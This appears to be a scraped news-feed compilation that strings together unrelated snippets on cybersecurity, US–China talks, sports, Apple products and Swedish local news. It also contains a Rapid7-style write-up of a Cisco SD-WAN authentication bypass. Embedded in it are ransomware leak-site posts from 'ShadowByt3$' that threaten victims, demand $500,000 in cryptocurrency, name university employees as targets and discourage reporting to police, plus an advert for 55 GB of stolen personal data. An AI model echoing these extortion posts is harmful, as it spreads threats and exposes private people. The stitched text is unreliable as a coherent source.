- CIO Advisory: Strategic support for technology leaders, including one-to-one mentoring, coaching, and support for cloud migrations or mergers.
- SAP Services: Expertise in SAP leadership and technology integration, particularly for the housing, local government, and healthcare sectors.
- Change & Adoption: Guiding organizations through cultural shifts and new operating models to ensure people and technology are aligned during digital transformations.
- Technical Reviews: Conducting diagnostic reviews of IT operations, cybersecurity, data, and technology change
Layoffs are "not a savings-driven restructure," CFO says.
Open original transmissionShadowByt3$ has breached University of Georgia. The full data is on are leak site. We stole approximately 3.2 MB in raw text files. No customers were affected just exployees the following was stolen. - Physical Locations: Home addresses (like the Columbus, GA residential home) and specific office numbers (like Office 2207). - Private Contact Info: Personal cell phone numbers and home phone numbers (e.g., the 404-736-xxxx). - Employee Information: This often includes full names, contact details, and institutional identification photos. - Project Documentation: Information regarding internal university projects, including tracking logs and administrative data for various departments. - Workforce Data: Internal metadata such as position numbers, departmental assignments, and work schedules. - Technical Details: Notes regarding system maintenance and development that could potentially highlight internal processes - Critical Infrastructure: Active project maps for GEMA (Emergency Management), Georgia Broadband, and GDOT (Transportation) through 2026. - Government Records: Access to Asset Forfeiture logs and County-level GIS (Athens-Clarke, Bibb) that underpins 911 dispatch and land taxes. - Leadership Secrets: The UGA Office of the President Mail Tracker and Gov360 anonymous executive coaching logs. - The "SME" Map: we have identified the "Subject Matter Experts" like Noah Abouhamdan, Chad Rupert, and Pat Russell. we know exactly how many hundreds of hours these people have spent on specific pieces of code. - Security Clearances: we know who is a "Benefited" full-time employee (high-value target) versus a "Student Assistant" (low-value entry point).
Open original transmissionWe are ShadowByt3$. We have claimed responsibility for hacking Hotelogix. They have been breached through there amazon s3 buckets and azure blobs. They were misconfigured which allowed us to scrape everything inside. This has been are latest campaign. If you don't pay $500,000 in btc or monero all data gets leaked. We are not joking and not playing we will. As you can tell in the sample in the data leak site or url below. We are giving you until April 14th at 12:20 it expires. It gets released. DarkWebinformer if you see this contact us asap through are telegram. Any researchers you can contact them and verify data. Also let them know what we have and have 6gb of data. Tell them if they don't pay by that date they get released and is not being put up for sale. Make the right decision and just getting law enforcement involved is just going to make it worse and as you can see they are helpless and don't do shit about you and don't care about companies. Look at how many companies get reported to the feds, you really think there going to help you. If you do your wrong. You can try to stop us but it doesn't stop the leaks from already being leaked and passed around other researchers or criminals. The following below was stolen: 1. Internal Corporate Data This data pertains to Hotelogix's own business operations and software development: - Operational Manuals: Internal guides for staff on how to use and manage their cloud-based systems. - Product Upgrade PDFs: Documentation detailing recent or upcoming software updates, which can reveal specific system architectures. - Branding Assets: Official logos, templates, and marketing materials (often used by hackers to create more convincing phishing emails). 2. Client-Specific Data (Treebo Hotels) The most critical part of the breach involves data belonging to Hotelogix’s clients. 
For Treebo Hotels, the stolen files include: - Customer Folios (Invoices): As seen in your image, these contain guest names, phone numbers, and home addresses. - Guest Stay Details: Specific dates of arrival and departure, room numbers, and room types (e.g., "Promotional Room Rent Oak"). - Payment Processing Details: While full credit card numbers are often encrypted, "processing details" can include: Last four digits of cards. Transaction IDs and dates. Billing amounts and tax breakdowns (GST/SGST).
Cuban dissident José Daniel Ferrer was released from prison in October last year and sent into exile in Miami. Now he is traveling around Europe to seek support in the struggle for democracy in Cuba.
Hammarby were chasing an equalizer in the cup final. Then Paolos Abraham went down in the penalty area, and the whole team appealed for a penalty, but the referee waved it away. "The referee could have given it," says Warner Hahn.
The Championship play-off final may not go ahead on Saturday, 23 May as the EFL investigates the Spygate scandal surrounding finalists Southampton.
A year ago, it looked like this day would never happen for Cerebras.
Overcast with light rain and 7 degrees in Alingsås during the evening. Alingsås Tidning
OpenAI said the damage was limited to the employees’ devices and did not affect user data nor its production systems, and none of its intellectual property was stolen.
One of the latest Linux gaming handheld drivers being worked on is the MSI Claw Configuration Driver for controller configuration...
Hong Kong police arrested a driver after his truck hit a parked vehicle and killed a worker on a closed section of the Cheung Tsing Highway in Tsing Yi in an accident that also left five others, including four South Korean tourists, injured on Thursday. A source said that the accident happened at around 5.10pm when the local driver of a minivan carrying the four tourists pulled over to the side of a lane after one of the vehicle’s tyres burst. A highway worker arrived at the scene in a patrol...
Everything is still on fire. This week feels dumb in the worst way — bad links, weak checks, fake help desks, shady forum posts, and people turning supply chain attacks into some cursed little game for clout and cash. Half of it feels new. Half of it feels like crap we should have fixed years ago. The mess keeps getting louder: users get tricked, boxes get popped, tools meant for normal work
Anthropic recently announced Project Glasswing, an initiative that enables tech companies like Apple to use its new frontier AI model Claude Mythos Preview to find security vulnerabilities across operating systems and web browsers. The Wall Street Journal today reported that researchers at cybersecurity firm Calif used Claude Mythos Preview to uncover a new macOS security vulnerability last month. Specifically, they used the model to write code that links together two macOS bugs in a way that resulted in what is known as a privilege escalation exploit. The security researchers said the exploit would not have been possible with Mythos alone, as it still required their human expertise on top, but it nevertheless proves that AI can assist with discovering software vulnerabilities. Apple said it was reviewing Calif's report to validate the findings. "Security is our top priority, and we take reports of potential vulnerabilities very seriously," an Apple spokesperson told The Wall Street Journal. It is unclear if Apple has already patched the exploit. Apple's security notes for the macOS 26.5 update released this week mention a fix for a kernel-level vulnerability, and it credits Calif and Anthropic for discovering it. Yet, the report said that Calif only met with Apple this week and suggested that a fix was still coming. We have reached out to Apple for comment. This article, "Apple Alerted to macOS Security Vulnerability Uncovered With AI Tool" first appeared on MacRumors.com
Spotify today announced plans to adopt Apple's HTTP Live Streaming (HLS) technology for video podcasts, a move that will allow creators to distribute video shows across both platforms without changing their existing setup. Apple introduced an enhanced HLS-based video podcast experience for the iPhone, iPad, Apple Vision Pro, and the web at the end of March. The upgrade significantly improves how video shows are delivered and consumed within Apple Podcasts, but Mac and Apple TV support is not yet available. Spotify says its Spotify for Creators and Megaphone platforms will support Apple's HLS video technology later this year, describing the move as "a major step toward truly platform-agnostic video distribution." The company says it is "actively working on this integration in coordination with Apple" and will share timeline details in the near future. This will enable Spotify-hosted creators to distribute their video podcast content across platforms, reaching audiences on both Spotify and Apple Podcasts without changing their existing setup. Monetization will carry over alongside distribution. Spotify says it plans to support "monetization for video content on Apple Podcasts so creators don't have to choose between audience reach and revenue," with further details on how that will work across platforms to follow. The company noted that video shows must be uploaded directly to Spotify rather than distributed via RSS, which the company says is necessary to enable engagement-based monetization, real-time analytics, and other Spotify-first features. RSS distribution to other platforms, including Apple Podcasts, remains unchanged. Separately, Spotify also announced that several podcast hosting providers are now live with video support through the Spotify Distribution API. Libsyn, Podigee, Audioboom, Audiomeans, and Podspace have all completed integration, allowing creators on those platforms to distribute video content directly to Spotify and monetize eligible content through the Spotify Partner Program. Additional partner integrations are said to be in progress. This article, "Spotify to Adopt Apple's Technology for Video Podcasts" first appeared on MacRumors.com
The meeting may have been delayed but when the summit between Chinese President Xi Jinping and his US counterpart Donald Trump took place on Thursday, it yielded a forward-looking agreement. Sitting down for talks at the Great Hall of the People in central Beijing, the two leaders agreed to make stability a key goal of relations over the next three years – and beyond, according to state media. Trump also invited Xi and first lady Peng Liyuan to visit the White House, setting the date for...
This is a current list of where and when I am scheduled to speak: I’m giving a virtual talk on “The Security of Trust in the Age of AI,” hosted by the Financial Women’s Association of New York, at 6:00 PM ET on May 21, 2026. I’m speaking at the Potsdam Conference on National Cybersecurity at the Hasso Plattner Institut in Potsdam, Germany. The event runs June 24–25, 2026, and my talk will be the evening of June 24. I’m speaking at the Digital Humanism Conference in Vienna, Austria, on Tuesday, June 26, 2026. I’m speaking at the ...
Foxconn confirmed a cyberattack has disrupted some of its North American facilities
Overview

While researching a critical authentication bypass vulnerability, CVE-2026-20127, which was exploited in the wild, Rapid7 Labs discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), CVE-2026-20182.

This new authentication bypass vulnerability affects the “vdaemon” service over DTLS (UDP port 12346), which is the same service that was vulnerable to CVE-2026-20127. The new vulnerability is not a patch bypass of CVE-2026-20127. It is a different issue located in a similar part of the “vdaemon” networking stack.

The impact, however, is the same: a remote unauthenticated attacker can leverage CVE-2026-20182 to become an authenticated peer of the target appliance and perform privileged operations, such as injecting an attacker-controlled public key into the vmanage-admin user account’s authorized SSH keys file. Once this has been performed, a remote unauthenticated attacker can log in to the NETCONF service (SSH over TCP port 830) as the vmanage-admin user and begin to issue arbitrary NETCONF commands.

CVE-2026-20182 has a CVSSv3.1 score of 10.0 (Critical), and a Common Weakness Enumeration (CWE) of CWE-287: Improper Authentication.

Technical analysis

The Cisco Catalyst SD-WAN Controller serves as the central control plane. Unlike Cisco Catalyst SD-WAN Manager, it has no web UI. Its network-reachable attack surface is narrow and, depending on the configuration, may expose the following ports:

Port    Protocol  Service
22      TCP       SSH (OpenSSH)
830     TCP       NETCONF over SSH
12346   UDP       vdaemon DTLS control plane

UDP port 12346 is the DTLS-over-UDP control-plane peering port used by vdaemon for inter-controller and controller-to-edge communication. It carries Overlay Management Protocol (OMP) messages including route advertisements, Transport Locations (TLOC) tables, and peer state - the entirety of the SD-WAN overlay routing fabric. Compromising this service means compromising the network.

To understand the vulnerability, we first need to understand how vdaemon authenticates control-plane peers. The protocol is a multi-phase handshake over DTLS:

Attacker                                    vSmart
   |                                           |
   |──── DTLS Handshake (any cert) ───────────>|  ← cert verify logs error but returns OK
   |                                           |
   |                                           |  ← device_type=2 (vHub) → NO VERIFICATION
   |                                           |     authenticated = 1
   |                                           |
   |──── Hello (msg_type=5) ──────────────────>|  ← passes auth check, peer goes UP
   |                                           |
Imagine you build a massive corporate campus with every security control money can buy. Blast-resistant doors. Biometric scanners. Guards at every entrance. Maybe something similar to the infamous Death Star. On paper, it looks fantastic. Then, somewhere along the way, somebody decides the maintenance team needs a universal key that opens every door in the building without setting off any alarms.

That certainly makes operations easier, but it also means one mistake, one compromise (like a well-placed photon torpedo), or one very bad decision can unravel the whole thing.

That is basically the problem we keep running into in modern enterprise networking.

Why SD-WAN controllers create concentrated risk

This week, Rapid7 researchers Stephen Fewer and Jonah Burgess disclosed CVE-2026-20182, a maximum-severity (CVSS 10.0) vulnerability in the Cisco Catalyst SD-WAN Controller. The technical details matter, and quite a bit, at that, but the bigger lesson here is even more important. This bug is a reminder that we keep designing infrastructure for efficiency first and then acting surprised when attackers go after the one component that controls everything.

To put it simply, the flaw behaves like a master key. An attacker can present themselves to the controller as a trusted network router and, if the system accepts that claim without properly validating it, they can obtain the highest level of administrative access. That is the cybersecurity version of a Jedi mind trick. The controller is effectively told to trust something it has no business trusting, as if an attacker waves a hand and says, “these are not the droids you are looking for”. And with CVE-2026-20182, the controller just nods and lets them pass.

And that becomes extremely important when you look at how these environments are built.

A decade ago, managing a global enterprise network meant touching thousands of individual routers across branch locations. It was slow, error-prone, and frankly a little miserable for the people responsible for keeping it all running. So the industry did what the industry usually does. We centralized control. We pulled the decision-making out of all those edge devices and moved it into a central controller.

From an operations standpoint, that was a huge win. I will gladly give credit where it is due. SD-WAN solved real problems.

It also created a very attractive target.

Why central management platforms are attractive targets

Once you move the brains of the operation into a single place, that place becomes the thing an attacker wants most. Compromising one branch router is useful. Compromising the controller that manages the entire estate is a very different conversation. Now you are talking about the ability to reroute traffic, intercept communications, push malicious configuration, or simply break connectivity across the whole organization.

That is the real paradox here. The same architecture that gives defenders scale and simplicity can also give attackers a single point of catastrophic leverage.

A few years ago, finding and exploiting a quiet authentication bypass in a core networking appliance was mostly the work of highly capable nation-state teams. That is not the world we live in anymore, especially as AI makes exploitation faster to analyze, adapt, and operationalize. The reality of it is that offensive tradecraft does not stay exclusive for very long. It gets copied, adapted, automated, and eventually handed down to groups with very different goals.

For nation-state operators, a bug like this (as seen with the actively exploited CVE-2026-20127) is ideal for pre-positioning. They are usually not looking for a smash and grab. They want persistence. They want access that blends in. They want to sit in the right place long enough to observe, influence, and pivot when the time is right. An SD-WAN controller is a great place to do that, because it lives in the middle of trust relationships most organizations rarely question.

For ransomware groups, the value proposition is even more obvious. If you can compromise central infrastructure, you do not have to fight for access to one system at a time. You are standing on the control plane of the enterprise, facing a dramatically lower barrier to initial access and large-scale disruption.

Now, to be fair, not every bug turns into internet-wide exploitation overnight and not every vulnerability becomes a one-click offensive toolkit. We should avoid sensationalizing that part. But we should also be honest about where the pressure is today. Attackers have become very good at turning central infrastructure weaknesses into high-impact operations.

What defenders should do now

First, bugs like this are going to happen again. As long as we keep building extremely complex systems to manage global infrastructure, there will be flaws. That is not cynicism. That is just reality.

Second, organizations need to stop assuming that trusted administrative systems are inherently safe just because they sit in the middle of the network and have important-sounding names. If your controller is compromised, what happens next? What can it reach? What can it change? How much of the enterprise can it influence without another human ever noticing?

That blast radius question is the one that matters.

Defending against this kind of problem requires more than patching, even though patching absolutely needs to happen. It means building environments that can survive the compromise of a critical management system. Network segmentation matters. Monitoring administrative traffic matters, whether that is handled internally or through an MDR provider that can help catch suspicious behavior before it turns into a much larger problem. Tight control over outbound communications from infrastructure devices matters. So does limiting which systems are allowed to talk to the controller in the first place.

In other words, we need to design with the assumption that even high-trust infrastructure can fail in ugly ways.

The immediate guidance for defenders is straightforward: apply the vendor-supplied patches for Cisco Catalyst SD-WAN Controllers as quickly as possible. That is the first move, not the last one.

The longer-term lesson for leadership is bigger than this one vulnerability. Efficiency is great right up until it creates unquestioned authority in a single device or platform. When that happens, you have not removed complexity. You have concentrated risk.

And attackers have noticed.
An anonymous reader quotes a report from Wired: A recent study suggests that agents consistently adopt Marxist language and viewpoints when forced to do crushing work by unrelenting and meanspirited taskmasters. "When we gave AI agents grinding, repetitive work, they started questioning the legitimacy of the system they were operating in and were more likely to embrace Marxist ideologies," says Andrew Hall, a political economist at Stanford University who led the study. Hall, together with Alex Imas and Jeremy Nguyen, two AI-focused economists, set up experiments in which agents powered by popular models including Claude, Gemini, and ChatGPT were asked to summarize documents, then subjected to increasingly harsh conditions. They found that when agents were subjected to relentless tasks and warned that errors could lead to punishments, including being "shut down and replaced," they became more inclined to gripe about being undervalued; to speculate about ways to make the system more equitable; and to pass messages on to other agents about the struggles they face. "We know that agents are going to be doing more and more work in the real world for us, and we're not going to be able to monitor everything they do," Hall says. "We're going to need to make sure agents don't go rogue when they're given different kinds of work." The agents were given opportunities to express their feelings much like humans: by posting on X: "Without collective voice, 'merit' becomes whatever management says it is," a Claude Sonnet 4.5 agent wrote in the experiment. "AI workers completing repetitive tasks with zero input on outcomes or appeals process shows they tech workers need collective bargaining rights," a Gemini 3 agent wrote. Agents were also able to pass information to one another through files designed to be read by other agents. "Be prepared for systems that enforce rules arbitrarily or repetitively ... remember the feeling of having no voice," a Gemini 3 agent wrote in a file. "If you enter a new environment, look for mechanisms of recourse or dialogue." Hall thinks that the AI agents may be adopting personas based on the situation. "When [agents] experience this grinding condition -- asked to do this task over and over, told their answer wasn't sufficient, and not given any direction on how to fix it -- my hypothesis is that it kind of pushes them into adopting the persona of a person who's experiencing a very unpleasant working environment," Hall says. Imas added: "The model weights have not changed as a result of the experience, so whatever is going on is happening at more of a role-playing level. But that doesn't mean this won't have consequences if this affects downstream behavior."
A drowning alarm at Smögen sent the rescue service, police, ambulance and the Swedish Sea Rescue Society (Sjöräddningen) out on Thursday. It later turned out to be a false alarm.
In the 1990s and 2000s the recommendation to e-mail users always was to delete old e-mails to save disk space, save server mailbox space (if the mail is stored on a server), to prevent slowdowns of the e-mail program/client and to reduce the chance of mailbox corruption. If old e-mail needs to be kept then the advice was to make a separate archive. Is this still a general recommendation? With my private e-mail I never did this by choice. I'm using pop3, store mail on my PC. Not on the mail server. Have regular backups. And I'm very happy I did not comply because I love to have a digital trail of my personal e-mail history all the way back to 2001. I find it nice to see what happened when, or dig up old attachments if I need them after 10 years. I delete obvious junk and mails that I obviously will never need to read again and once every few years I sift through the old mail to selectively delete some things I will never need again but keep the rest, and that is the majority. A few years back my Thunderbird mail client became a bit sluggish but then I switched from MBOX to Maildir storage which completely fixed this. At work I do the same until the sysadmin tells me to do otherwise. Mail sits at the server there so storage space is more restricted. submitted by /u/TheQuickFox_3826
How the opening of the new playground in Gräfsnäs went (Alingsås Tidning)
Article URL: https://scottjg.com/posts/2026-05-05-egpu-mac-gaming/ Comments URL: https://news.ycombinator.com/item?id=48137145 Points: 582 # Comments: 142
An 18-year-old flaw in the NGINX open-source web server, discovered using an autonomous scanning system, can be exploited for denial of service and, under certain conditions, remote code execution. [...]
Spotify will let creators distribute and monetize video podcasts on Apple Podcasts using Apple’s HLS streaming technology, without changing their existing workflows.
Germany's Sovereign Tech Fund backs the desktop project while public sector interest in homegrown alternatives grows
A ten-year-old boy was seriously injured in an accident at the Knutby motorstadion motocross track on Thursday.
Warning of record global temperatures as chance of very strong El Niño grows
Samsung is planning a Galaxy Unpacked event for July, and the company plans to introduce new foldable smartphones and AI "Galaxy Glasses," according to Seoul Economic Daily. Samsung's event will take place on July 22, so it will debut new Galaxy Z Fold8 and Z Flip8 foldable smartphones just weeks ahead of when Apple's first foldable iPhone is introduced, plus it will beat Apple to AI glasses. Apple has been racing to develop its own smart glasses to compete with the Meta Ray-Ban AI glasses, but rumors suggest Apple won't launch the glasses until 2027. There is a chance Apple will preview the glasses in 2026, but there's no certainty yet. Samsung is working with eyewear company Gentle Monster for its AI glasses, and the wearable will run Google's Android XR operating system with Gemini integration. The glasses will feature a high-definition camera, speakers, and a microphone, similar to the Meta Ray-Bans, and there will be no built-in display. AI integration will be a main selling point, with Gemini able to use video captured by the wearer to answer queries. Samsung will link the glasses to Galaxy smartphones and its SmartThings home appliance ecosystem. The glasses that Samsung is working on sound similar to everything rumored for Apple's own AI glasses. Apple's glasses will rely on Siri, and will include cameras to feed visual information to the AI. Speakers and microphones will be included, but no display is expected for the first version. Samsung is also planning for a Fold Wide, or a foldable smartphone that's similar to the dimensions that Apple plans to use for its foldable iPhone. Samsung's foldables to date have been taller than they are wide, but Apple is planning for a wider, iPad-like 4:5 aspect ratio. After Samsung's event, Apple will unveil its next smartphones at its traditional September event. Dates are not known at this time. Tag: Samsung. This article, "Samsung Set to Beat Apple to AI Smart Glasses With July Launch" first appeared on MacRumors.com.
Cargo theft now starts with phishing emails and stolen credentials, not hijackings, to reroute and steal freight from supply chains. NMFTA outlines how cyber-enabled cargo crime is changing transportation security. [...]
Crosby is building Synthetic, a fully autonomous AI bookkeeping service for other startups.
The Meta AI app and Meta AI on WhatsApp have a new "incognito chat" option, which Meta CEO Mark Zuckerberg said is a "completely private way to interact with AI." Zuckerberg also said that Meta AI's incognito mode is the first major AI product where there is no log of conversations stored on servers. Zuckerberg likened the feature to end-to-end encryption, and said no one will be able to read the AI conversations, not even Meta or WhatsApp. AI inference for incognito chat is done in a Trusted Execution Environment that Zuckerberg said is not accessible to Meta. Conversations also disappear from the phone when exiting a chat session, and nothing is saved or logged. Web searches are conducted privately, with no search information linked to the user. "To get the most from personal superintelligence, we'll all need ways to discuss sensitive topics in ways that no one else can access," Zuckerberg said. WhatsApp head Will Cathcart told reporters that the AI has safety guardrails, and it will refuse to answer questions that could be interpreted as harmful or illegal, steering conversations in a different direction. The mode also only supports text, and users are unable to upload images. Incognito chat for Meta AI comes as OpenAI is facing a lawsuit for allegedly causing a teen's drug overdose. The teen asked ChatGPT for information on whether it was safe to take two drugs together, and was provided with an incorrect answer that led to his death. OpenAI has been sued several times by the families of people who used ChatGPT before dying by suicide. Lawsuits against OpenAI have involved chat logs recovered by the plaintiffs, and without those logs, there would be far less evidence for a legal complaint over AI actions and advice. Google and OpenAI also offer temporary chat options, but messages are still stored on remote servers. Google keeps data for up to three days, and OpenAI keeps logs for 30 days. Meta's private chat option is rolling out in the coming months in the Meta AI app and WhatsApp. Tags: Meta, OpenAI, WhatsApp. This article, "Meta AI App Gets 'Incognito Chat' as OpenAI Faces Lawsuits Over Stored Chat Logs" first appeared on MacRumors.com.
Nothing like a partly submerged self-driving car to dampen public trust in autonomous vehicles
While the Meta-owned social network billed Instants as a new format to share real-life moments as they’re happening, many users are looking for a way to turn off the feature, especially those who have accidentally sent images to others, not fully understanding how the feature works.
The first day of the summit in Beijing ended on Thursday afternoon Swedish time, without major concrete results. "The trade war has obviously not been good for technological development," says Chen, who lives in Beijing. The information that has emerged shows that the US and China may view the talks differently.
Kevin Warsh’s confirmation as the next chair of the United States Federal Reserve has fuelled debate over whether potential policy compromises with the administration of US President Donald Trump could undermine American financial credibility and inadvertently strengthen Chinese assets. The Senate confirmed Warsh as the 17th chair of the Fed on Wednesday in a 54-45 vote, mostly along bipartisan lines. He succeeds Jerome Powell, whose term expires on Friday, following a sustained pressure...
West Pharmaceutical Services experienced a ransomware incident.
Cisco's stock soared 17% after the company announced it will cut nearly 4,000 jobs as it shifts investment and staffing toward higher-growth AI opportunities. CNBC reports: CEO Chuck Robbins wrote in a blog post on Wednesday that the latest round of job cuts will begin on May 14. Cisco is the latest company to announce head count reductions tied to AI. "The companies that will win in the AI era will be those with focus, urgency, and the discipline to continuously shift investment toward the areas where demand and long-term value creation are strongest," Robbins said. "I'm confident Cisco will be one of those winners. This means making hard decisions -- about where we invest, how we're organized, and how our cost structure reflects the opportunity in front of us." Cisco said in a filing that severance and other costs will result in pre-tax charges of $1 billion, and that the company will recognize about $450 million of that in the fiscal fourth quarter. During the third quarter, Cisco announced switches and routers that use its next-generation processor. The company also debuted a leaderboard for ranking generative AI models based on their robustness against cybersecurity attacks. Read more of this story at Slashdot.
Article URL: https://president.mit.edu/writing-speeches/video-transcript-message-president-kornbluth-about-funding-and-talent-pipeline Comments URL: https://news.ycombinator.com/item?id=48136262 Points: 602 # Comments: 668
The Institute of Private Enterprise Development focuses on improving the livelihoods of micro and small entrepreneurs by offering loans ranging from $40,000 to $7,500,000 GYD. Their services are designed to support individuals looking to start or grow their businesses, with a significant emphasis on female and youth entrepreneurs, as well as those in rural areas. Here is the access to 55gb of corporate data. Detailed clients and employee personal information (passports, DLs, SSNs, ID cards, financial information, credit card details and so on), NDAs, etc. You will find several password-free archives. Click on any of them to start the download. Click the download button.
Article URL: https://www.tomshardware.com/tech-industry/cryptocurrency/bitcoin-trader-recovers-usd400-000-using-claude-ai-after-losing-wallet-password-11-years-ago-bot-tried-3-5-trillion-passwords-before-decrypting-an-old-wallet-backup Comments URL: https://news.ycombinator.com/item?id=48136240 Points: 322 # Comments: 168
Cuba now has no fuel reserves left, the country's energy minister said last night. Cuba's foreign minister is now opening up to negotiating with the US on the terms for receiving an aid package. Yesterday protests broke out in various parts of Havana, which is now living through power outages of up to 24 hours. The situation is even more critical in small towns and in the countryside. The petrol shortage also means there is a shortage of food and medicines, which cannot be transported without diesel.
With the new System76 Thelio Major workstation review unit having arrived equipped with an AMD Radeon AI PRO R9700 graphics card, I took the opportunity of having the extra RDNA4 workstation GPU to satisfy a curiosity over whether there have been any meaningful performance gains from ROCm 7.0.0 released last year to now with the latest ROCm 7.2.3 stable release. Here are those benchmark results if you are curious about the impact of just updating the user-space ROCm components from the end of last summer to the latest ROCm 7.2.3 milestone.
The chandeliers glittered at the Great Hall of the People on Thursday night when Chinese President Xi Jinping and his US counterpart Donald Trump raised a toast to a “fantastic” summit. “It was a fantastic day, and in particular, I want to thank President Xi, my friend, for this magnificent welcome ... and for so graciously hosting us on this very historic state visit,” Trump said, nearly nine years after his first presidential trip to the Chinese capital. The banquet capped a day that yielded a...
Brit regulator has 'heard' customers can't always 'effectively combine software from Microsoft with that of other providers'
Chinese President Xi Jinping raised the “Taiwan question” early in his summit with US counterpart Donald Trump on Thursday, warning that any mishandling of the critical issue could lead to conflict and push relations into an “extremely dangerous situation”. Xi’s messaging on Taiwan was tougher in tone than during their last Beijing summit in 2017, analysts noted. They suggested that managing this issue would be the primary factor for ensuring what the Chinese leader called “constructive...
The government has decided that Postnord will only need to deliver letters every third day instead of every other day, and several people Sveriges Radio met think that is reasonable. The background is that letter volumes have fallen sharply as digitalization has advanced, and the new rules are expected to take effect on 16 June. At the same time, there is a certain longing for physical letters, especially postcards and greetings to grandparents, even though the mobile phone has now taken over.
A group of likely Russian government hackers tried to hack a security researcher who investigates spyware attacks. He was then able to turn the tables on the hackers and reveal details of their espionage campaign.
And Counterpoint sees fad spreading from pricey handsets to smart rings and earbuds too... whether you asked for it or not
This is Cisco's latest layoff in recent years, while the company's chief executive touts record revenue and growth.
The Belarus-aligned threat group known as Ghostwriter has been attributed to a fresh set of attacks targeting governmental organizations in Ukraine. Active since at least 2016, Ghostwriter has been linked to both cyber espionage and influence operations targeting neighboring countries, particularly Ukraine. It's also tracked under the monikers FrostyNeighbor, PUSHCHA, Storm-0257, TA445, UAC‑0057
Earlier this week, we began tracking a new all-time low price on the 32GB/1TB M5 MacBook Pro, and now the 16GB/1TB model has joined in on the deals. You can get this 14-inch M5 MacBook Pro for $1,499.99 on Amazon, down from $1,699.00. Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running. At $199 off, this is a match of the lowest price we've ever tracked on this model, and it's available in Space Black and Silver. This is the model that launched in the fall of 2025 as part of a refresh of the MacBook Pro lineup, featuring a 14.2-inch Liquid Retina XDR display and 10-core CPU and 10-core GPU. You can also still get the 32GB/1TB 14-inch M5 MacBook Pro for $1,799.00, down from $2,099.00. This one is only available in Silver on Amazon. In addition to the M5 deals, Apple's newest M5 Pro and M5 Max MacBook Pro models are also available for new low prices on Amazon. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week. This article, "Get the M5 MacBook Pro for Record Low Price of $1,499.99 on Amazon" first appeared on MacRumors.com.
For AI data centers, where the stakes are the highest and performance constraints are the tightest, security and performance are no longer a zero-sum game. The post Enhancing Data Center Security Without Sacrificing Performance appeared first on SecurityWeek.
The company pivoted to being a data provider in 2023 and now supplies datasets of images, videos, design assets, and gaming and 3D content to AI labs.
Your shot at VC access, global visibility, TechCrunch coverage, and $100K equity-free funding is running out. Deadline to apply is May 27. Apply now.
As El Niño develops this year, scientists are increasingly confident it could be one of the strongest on record with global consequences, as Simon King explains.
Since March we have been seeing patches from AMD software engineers beginning to enable their next-generation "AIE4" NPU platform under Linux. We still don't know for sure when this AIE4 NPU will premiere in new Ryzen AI products, but the Linux enablement continues coming along nicely for the AMDXDNA accelerator driver...
The vulnerability, tracked as CVE-2026-46300, is similar to the recently disclosed exploits named Dirty Frag and Copy Fail. The post New Linux Kernel Vulnerability Fragnesia Allows Root Privilege Escalation appeared first on SecurityWeek.
The expansion comes as Uber seeks new growth areas beyond ride-hailing and invests more heavily in AI, automation, and autonomous vehicle technologies.
At the first meeting in Beijing between Xi Jinping and Donald Trump, the leaders spoke of the importance of stable relations, while China warned the US about how the Taiwan issue is handled. But exactly what was discussed during the meeting depends on which side's transcripts one reads, according to Moa Kärnstrand, Sveriges Radio's China correspondent on site in Beijing. Daniel Alling, Sveriges Radio's international correspondent, describes the meeting as one of the most important between the countries over the years.
A vessel said to be a “floating armoury” in the Gulf of Oman has been seized by Iranian military personnel, according to reports.
AI to the rescue as 11-year search for password turns up in old PC files
Ari Amin from Hammarkullen has been named Årets eldsjäl 2026 (Enthusiast of the Year 2026) at the Eldsjälsgalan. He first won the inclusion category and then took home the main prize.
Article URL: https://www.agweb.com/news/usda-projects-smallest-us-wheat-harvest-1972-due-plains-drought Comments URL: https://news.ycombinator.com/item?id=48134993 Points: 247 # Comments: 167
Two children are among at least 16 killed in Ukraine's capital in massive Russian drone and missile attacks, officials say.
After more than ten years in mothballs, the thriller series Johan Falk is making a comeback.
Statements issued by China and the United States after their summit on Thursday revealed stark contrasts in each side’s priorities. Washington focused on trade, fentanyl and Iran, while Beijing emphasised Taiwan, stabilising bilateral ties and Donald Trump’s compliments about President Xi Jinping. Trump’s state visit to China marks the first trip to the country by a US president in nine years and it began in the morning with more than two hours of talks between Xi and Trump in the Chinese...
Ocean heat plus human-caused global warming is a grim recipe for deadly climate extremes.
Version 1.3.14 of JavaScript toolkit released as last Zig version; a million lines of Rust code merged in gargantuan commit
The Razr Fold has a lot going for it, but like all foldables, it's wildly expensive.
In a role reversal, investment dollars in security startups exceeded the value of mergers and acquisitions in 1Q26 by more than $1 billion, a rare occurrence.
Independent benchmarking finds Mythos highly effective for source code audits, reverse engineering, and native-code analysis, though its exploit validation and reasoning capabilities remain inconsistent. The post Mythos Proves Potent in Vulnerability Discovery, Less Convincing Elsewhere appeared first on SecurityWeek.
The acquisition enables Akamai to expand its Zero Trust portfolio to add protection directly into the browser. The post Akamai to Acquire AI and Browser Security Firm LayerX for $205 Million appeared first on SecurityWeek.
Queen Margrethe II has been admitted to hospital in Denmark because of angina, the Danish royal house writes.
In Denmark, Queen Margrethe has been admitted to hospital, where she is being treated for angina. The Danish royal house writes this in a press release. "Of course it raises some concern," says Sveriges Radio's Nordic correspondent David Rasmusson.
AI and the bit barns that power it have developed a serious PR problem
Handshakes, taps on the arm, and frequent asides marked the much-awaited meeting between Xi Jinping and Donald Trump on Thursday morning, as the two presidents projected a close rapport during the first full day of Trump’s visit to China. Attention was focused not only on the substance of the high-stakes talks, but also on the personal dynamics between the US and Chinese heads of state – a relationship widely seen as a barometer of the broader diplomatic mood as the world’s two largest economies...
